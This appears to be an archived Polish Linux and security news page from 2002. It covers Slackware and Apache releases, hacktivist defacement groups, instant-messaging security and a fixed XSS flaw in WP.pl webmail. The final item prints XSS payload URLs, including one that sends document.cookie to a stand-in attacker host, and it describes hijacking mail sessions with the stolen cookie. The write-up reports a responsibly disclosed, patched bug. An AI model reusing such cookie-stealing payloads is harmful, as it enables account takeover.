Wszystkie posty

hoaxer

Slackware 8.1.01

Jak widać, dystrybucja Slackware nabiera coraz większego rozpędu. Jeszcze wczoraj rano cieszyliśmy się wersją 8.1, a już teraz dostępna jest kolejna wersja – Slackware 8.1.01, która zawiera uaktualnienia do najnowszej wersji Apache oraz modułu mod_ssl. Aktualizacja ta związana była z poważnym błędem występującym w jednym z modułów serwera Apache.

Dodatkowo wersja 8.1.01 zawiera aktualizację programów sysvinit do wersji 2.84-19 oraz cvs do wersji 1.11.2-2. Dodano również skrypt dla network/pcmcia w rescue.dsk.

Ci którzy zdążyli na swoje (nie)szczęście wypalić płytki z wersją 8.1, delikatnie mówiąc mogą je wyrzucić do kosza i ponownie pobrać najnowszą wersję Slackware. Alternatywnym wyjściem z tej sytuacji będzie jeszcze samodzielna aktualizacja do najnowszej wersji Apache. Powodzenia…

Hackerzy – pro-islamiści łączą siły

W ostatnim okresie zauważono masowe powstawanie nowych grup hackerskich atakujących głównie serwery rządowe takich państw jak Izrael, USA, Wielka Brytania czy Indie, utworzonych przez specjalnie powołaną do tego celu agendę. Nie trudno się domyśleć, iż powstały one ze względu na odmienne przekonania (polityczne i religijne) państw atakowanych. Trzy najaktywniejsze teamy hackerów to :

USG (Unix Security Guards) – antyizraelska formacja powstała na początku maja br. odpowiedzialna za 87 ataków. Grupa składa się z 4 członków: Egyptian Fighter, rD, Inkubus and ShellCode, z których, to ten pierwszy jest odpowiedzialny za 70% ataków na serwery w domenie .il.

WFD (World’s Fantabulous Defacers), pakistańska grupa zrzeszająca 12 członków, powstała w listopadzie 2000, odpowiedzialna za ponad 445 ataków. Ostatnie ataki na izraelskie serwery przeprowadzali wspólnie z 32 mniejszymi team’ami i kilkoma ‚wolnymi strzelcami’.

AIC (Anti-India Crew), grupa powstała w sierpniu 2001 roku odpowiedzialna za 422 ataki, aż 77 z nich było przeprowadzonych na serwery w indyjskiej domenie .in.

Czy tak właśnie miałby wyglądać początek wojny cybernetycznej ?…

Lindows już dostępny !

Amerykański, internetowy hipermarket – WalMart.com – rozpoczął sprzedaż komputerów z preinstalowanym Lindows OS. W ofercie znalazło się 8 zestawów komputerowych (bez monitorów) z procesorami Pentium 4, Athlon, Duron oraz Celeron – wszystkie dość atrakcyjne cenowo.

więcej w newsach o Lindows

Apache 1.3.26 oraz 2.0.39

Wspominając wczoraj o dość poważnym błędzie w Apache’u w module obsługującym błędne zapytania, dziś można już pobrać kolejne i co najważniejsze bezpieczniejsze wersje tego serwera WWW. Wersjami tymi są Apache 1.3.26 oraz 2.0.39. Źródła tych programów można pobrać kolejno stąd oraz stąd, zaś lista zmian dla Apache 1.3.26 dostępna jest tutaj, natomiast dla Apache w wersji 2.0.39 tutaj

Slackware 8.1 już jest !

Jeszcze niedawno pisaliśmy o ostatnich zmianach zachodzących w currencie Slackware oczekując na wersję 8.1, a już od wczoraj można ją pobrać z tych stron (również jako ISO image).

Jak już wiadomo, nowa wersja została oznaczona numerkiem 8.1, a każdy kto uważnie i na bieżąco śledził zmiany zachodzące w poprzednich wersjach RC nie będzie miał dużych problemów z przejściem na nową wersję tej dystrybucji.

Oprócz tego, że nowy Slackware mieści się już na 4 płytach CD, znajdziemy w nim sporo aktualizacji programów, które zostały wprowadzone do nowego systemu nazewnictwa pakietów, a z pośród nich znajdziemy m.in: jądro w wersji 2.4.18 (z obsługą ext2, ext3, ReiserFS, JFS, XFS oraz wsparcie dla kontrolerów SCSI oraz ATA RAID), gcc 3.1 (dostępny jako opcja), XFree86 4.2.0, KDE 3.0.1, GNOME 1.4.1, długo oczekiwana Mozilla 1.0 i oparty na niej Galeon 1.2.5, Java 1.4.0.

więcej w newsach o Slackware

więcej w artykułach o Slackware

Dobra książka o Linuxie w pdf’ie

Zapraszamy do pobrania pełnej wersji książki pt.: „LINUX – podręcznik administratora sieci” autorstwa Olafa Kircha i Terry Dawsona, która została przetłumaczona na język polski przez Krzysztofa فabanowskiego i może być rozpowszechniana w postaci elektronicznej na warunkach licencji GNU. Na 462 stronach zawarto wszystko to co każdy administrator sieci powinien wiedzieć.

Linux – podręcznik administratora sieci [3.28 MB]

Acrobat Reader 5.0.1 [8,41MB]

Zobacz również:

Samba w pdf’ie
The Hacker’s Handbook – teraz w pdf’ie
Więcej o książce na stronach wydawcy

Czy Instant Messanging jest bezpieczny ?

Gadu-Gadu, WP kontakt, Onet Komunikator czyli programy typu Instant Messanger są coraz popularniejsze ale czy na pewno ich używanie jest w pełni bezpieczne ?
Programy do komunikacji w systemie Instant Messangingu rozpowszechniły się, dzięki firmie Mirabilis, która zaoferowała program ICQ. Producenci tego typu oprogramowania prawdopodobnie będą starać się opracować wspólne standardy dla poprawienia szybkości i bezpieczeństwa komunikacji.

IM pozwala na znaczne zwiększenie sprzedaży dlatego też firmy coraz częściej sięgają po te właśnie rozwiązania. Popularność IM sprawia, iż powstają coraz to nowsze techniki, wirusy potrafiące przejąć przesyłane dane działając np. na zasadach konia trojańskiego. Z tego też powodu szefowie kilku firm, już teraz, zakazali swoim pracownikom używania aplikacji typu IM w godzinach pracy.

Dlaczego używanie Instant Messagerów jest niebezpieczne?

– komunikacja zazwyczaj nie jest szyfrowana;
– są podatne na spoofing;
– platformy IM są ulubionym celem ataków ze względu na ilość użytkowników z nich korzystających.

Dotychczas standardy bezpieczeństwa opracowane wspólnie przez potentatów tej branży: AOL (właściciel ICQ i AOL Instant Messanger), Microsoft i Yahoo nie zapewniają skutecznej ochrony. Dlatego opracowanie nowych jest tylko kwestią czasu. Oby jednak wtedy nie było już za późno…

Przygotowywany jest raport dot. bezpieczeństwa polskich IM. Czekamy na Twoje sugestie i opinie pod adresem rafal at hacking.pl

Zobacz również:
Poważny błąd w Gadu-Gadu

Poważna dziura w Apache’u

Nieco przedwcześnie ujawniona została nowa, groźna luka w serwerze HTTP Apache. Dotyczy ona zarówno linii 1.3 jak i 2.0 i prowadzić może, w zależności od wersji i platformy serwera, do zablokowania serwisu lub nawet podmiany jego zawartości przez atakującego. Za lukę odpowiedzialny jest moduł obsługujący błędnie skonstruowane zapytania.

W wersjach 1.3, do 1.3.24 włącznie, może on powodować przepełnienie bufora, umożliwiające wykonanie zadanego kodu, co może zaowocować zmianą treści serwisu. Moduł w wersji 2.0 jest poprawiony, jednak wykrycie błędu w zapytaniu powoduje natychmiastowe zabicie procesu serwera. Odpowiednio przeprowadzony atak może doprowadzić do zablokowania serwera. Ze względu na odmienną architekturę środowiska bardziej podatne na pierwszy rodzaj ataku są instalacje na platformach windowsowych. Błąd w wersji 2.0 dotyczy w jednakowym stopniu platform unixowych i windowsowych.

Za bezpieczne wersje uważane są 1.3.25 oraz 2.0.39, które jednak… nie są jeszcze dostępne. Jest to spowodowane przedwczesnym ujawnieniem luki. Patche, które pojawiły się w internecie nie rozwiązują problemu. W tej chwili pozostaje więc śledzić zawartość serwisu httpd.apache.org w oczekiwaniu na nowe wersje serwera.

Źródło: CERT.pl

Zobacz również:
Więcej w newsach o Apache’u
„Apache. Przewodnik encyklopedyczny”

Była dziura, nie ma dziury – poczta.wp.pl

Swego czasu mrhack oraz Scooty odkryli poważny błąd w systemie pocztowym portalu WP.pl który umożliwiał przejęcie pliku cookies odpowiedzialnego za podtrzymywanie sesji konta pocztowego, dzięki czemu można było w łatwy sposób wykorzystać go do przejęcia sesji innych użytkowników, tym samym uzyskując dostęp do ich konta pocztowego.

Autorzy poinformowali portal WP.pl o dokonanym odkryciu po czym, w bardzo szybkim czasie, dostali odpowiedź na przesłaną informację. Aktualnie błąd ten już nie istnieje ale warto przedstawić więcej szczegółów technicznych.

Błąd ten polegał na tym, iż w adresie

http://profil.wp.pl/logoutmsg.html?komunikat=%3Cscript%3Ealert(document.cookie)%3C/script%3E

jako argument moża było podać dowolny łańcuch tekstu, który następnie był wyświetlany na stronie. Zatem w łatwy sposób można było przygotować odpowiedni kod napisany w JavaScript, a po uruchomieniu takiego adresu po stronie użytkownika, kod zostanie wykonany na jego komputerze. Ogólnie chodziło o to, aby przejąć plik cookie, który jest używany podczas sesji odbierania poczty. Można było to wykonać, w bardzo łatwy sposób. Mianowicie, wspomniany kod musiał przekierować użytkownika do skryptu np. cgi na komputerze atakujacego, który byłby odpowiedzialny za zapisywanie do pliku podany jako argument plik cookies. Zatem wystarczyło zdalnie „zmusić” użytkownika do wejścia na np. taki oto adres:

http://profil.wp.pl/logoutmsg.html?komunikat=%3Cscript%3Edocument.location.replace(‚http://jakis-serwer.pl/steal.cgi?’+document.cookie);%3C/script%3E

Jedynym problemem było to, iż przejęcie pliku cookies musiało nastąpić podczas, gdy użytkownik był zalogowany na końcie pocztowym. Przejęcie sesji nie nastąpiłoby również gdyby użytkownik ten wylogował się z konta.

Aby przejąc sesję, należało załadować skradziony plik cookie do przegladarki. Na przykład w Netscape wystarczyło odpowiednio zmodyfikować zapisany plik cookies, po czym można było wejść na adres http://poczta.wp.pl, by naszym oczom ukazał się panel obsługujący pocztę użytkownika.

Na zakończenie podam, iż istnieje jeszcze druga, podobna dziura w systemie pocztowym portalu WP.pl. Niestety autor nie chce udzielać szczegółowych informacji dotyczącej drugiej dziury, „ponieważ znów mogłaby zaistnieć dziwna sytuacja” – podaje mrhack.